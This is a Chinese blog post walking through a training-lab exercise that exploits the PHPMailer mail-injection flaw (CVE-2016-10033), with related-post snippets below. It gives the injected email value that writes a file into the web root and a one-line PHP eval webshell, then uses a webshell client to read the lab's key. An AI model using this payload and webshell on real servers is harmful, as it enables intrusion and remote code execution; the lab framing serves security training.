PHPMailer远程命令执行漏洞溯源

利用邮件注入漏洞获取服务器KEY
最新推荐文章于 2023-10-29 16:08:07 发布
原创 最新推荐文章于 2023-10-29 16:08:07 发布 · 355 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#墨者学院 #web

本文介绍了一种通过邮件注入漏洞控制服务器的方法。步骤包括:在靶场找到邮件发送功能,构造特定格式的email和message,使用菜刀连接目标服务器,最终在根目录下获取到KEY。

1.打开靶场,找到发送邮件的位置,进入邮件页面
2.填写邮件消息
1.任意用户名
2.在email写入:
“aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com
3.在message写入:

<?php @eval($_POST[a]);?>

3.使用菜刀连接,链接是:http://219.153.49.228:41056/a.php
4.在根目录下得到KEY

cc_de_csdn
关注
[系统安全] 五十八.恶意软件分析 (10)利用火绒安全实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-26 1101
前文介绍了利用MS Defender实现恶意样本家族批量标注。这篇文章将讲解如何利用火绒实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
[系统安全] 五十七.恶意软件分析 (9)利用MS Defender实现恶意样本家族批量标注(含学术探讨)
最新发布
杨秀璋的专栏
04-18 1038
前文介绍了IDA Python配置过程和基础用法,然后尝试提取恶意软件的控制流图(CFG)。这篇文章将讲解如何利用MS Defender实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
墨者学院-PHPMailer远程命令执行漏洞溯源
qq_47094508的博客
07-01 1024
拿到靶场之后点击访问分享一个小工具,用来爬取相关的url Link Gopher可以看到有用的就一个mail.php 进入之后来到一个邮件测试页面,很明显这里是一个功能点 phpmailer介绍PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)burp抓包,更改email处payload为 更改message处payload为 然后访问http://124.70.71.251
墨者 - PHPMailer远程命令执行漏洞溯源
吃肉唐僧的博客
06-30 1616
用bp抓包,发现与后台交互的文件 构建email "aaa".-OQueueDirectory=/tmp/.-X/var/www/html/a.php@ aaa.com message <?php@eval($_REQUEST[a]);?> 访问a.php文件,上传成功 菜刀无惧链接 原理参考:https...
墨者PHPMailer远程命令执行漏洞溯源题解
zr1213159840的博客
01-07 601
打开环境后,给了一个页面,但是啥也没有,看不出来 对目录进行一下爆破试试,使用dirsearch,能看到有个mail.php 百度一下看下这个phpmailer有什么问题,发现存在命令执行漏洞,那么就是按照步骤跑就行了。 打开xxx/mail.php页面,在you name栏里面随便写啥,比如abc。在your email栏中填入:“aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @ aaa.com 在your message中填入一句话木马 &
墨者靶场 初级:PHPMailer远程命令执行漏洞溯源
qq_43233085的博客
01-14 772
墨者靶场 初级:PHPMailer远程命令执行漏洞溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师对某网站进行授权测试,发现了一个管理员留下的邮件测试页面,你能帮他完成测试吗 实训目标 1、了解PHPMailer用处; 2、了解Burp suite中Spider模块使用方法; 3、了解PHPMailer远程命令执行漏洞形成原因; 4、了解PHPMailer远程命令执行漏洞利用...
预防攻击:网络安全事件研判
Sgirll的博客
10-29 3309
在当今信息时代,安全事件不断涌现,给个人和组织带来了巨大的威胁。为了保障信息的安全,我们需要建立一套科学、有效的安全事件分析思路及逻辑。本文将从几个方面介绍如何对安全事件进行分析,以期为读者提供一些有用的指导。
PHPMailer远程命令执行漏洞复现
thelostworld
12-31 2068
PHPMailer远程命令执行漏洞复现 一、漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。 二、影响版本: PHPMailer<5.2.18 三、漏洞复现 Docker环境: dockerrun --r..
PHPMailer远程命令执行漏洞复现(CVE-2016-10033)
谢公子的博客
04-05 2381
PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。 CVE-2016-10033是PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请求导致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造...
经典CVE:PHPMailer 远程命令执行漏洞
zh的博客
10-15 623
靶场地址:http://whalwl.site:8038/ 解题准备:了解PHPMailer 远程命令执行漏洞的利用方法 解题思路: 1、在右键发送页面,构造一句话 2、提示发送失败,但其实一句话已经完成 3、 尝试访问一句话,成功 4、蚁剑连接成功,去找flag把 ...
漏洞情报 | PHPMailer 多个远程代码执行漏洞
爱国小白帽
06-18 743
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 PHPMailer是一个用于发送电子邮件的PHP类库。 2021年6月18日,360漏洞云监测到PHPMailer 6.5.0之前的版本存在多个远程代码执行漏洞。 CVE-2021-34551:该漏洞源于在处理$lang_path参数时对setLanguage()方法内用户提供数据的验证不足,远程攻击者可向应用传送一个特殊构造的输入,通过受影响的参数设置UNC路径,从而在系统上执行任意PHP代码。 CVE-2021-3603:该该漏洞
在线靶场-墨者-命令执行2星-PHPMailer远程命令执行漏洞溯源
weixin_42079912的博客
08-09 452
打开靶场网页,根据题意管理员留下的邮件测试页面。于是寻找邮件测试页面。 打开邮件测试页面。 使用邮件注入木马 You name:mozhe(随便输入) Your email:“abc”. -OQueueDirectory=/tmp/. -X/var/www/html/abc.php @abc.com(abc可更改) You message:<?php @eval($_POST[abc])...
PHPMailer远程代码执行高危漏洞(CVE-2016-10033)
Anprou的博客
12-27 2173
据说其全球范围内的用户量大约有900万——每天还在持续增多。
php远程执行漏洞分析
Aring专注网络安全
09-25 996
<?php //post['ta']为空返回cleanboard.net,所以提交ta=1&a="任意域名"则$ta="任意域名" if(empty($_POST['ta'])) {$ta ="cleanboard.net";} else {$ta =$_POST['a'];} //socket 打开连接$ta的80端口 $da = fsockopen($ta, 80, $errno, $er
使用PHPMailer实现远程SMTP服务器邮件发送
在使用PHPMailer调用远程SMTP服务器发送邮件时,开发者需要了解SMTP协议的基本概念、PHPMailer类库的使用方法,以及如何正确配置远程SMTP服务器的相关参数。 SMTP(Simple Mail Transfer Protocol,简单邮件传输...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值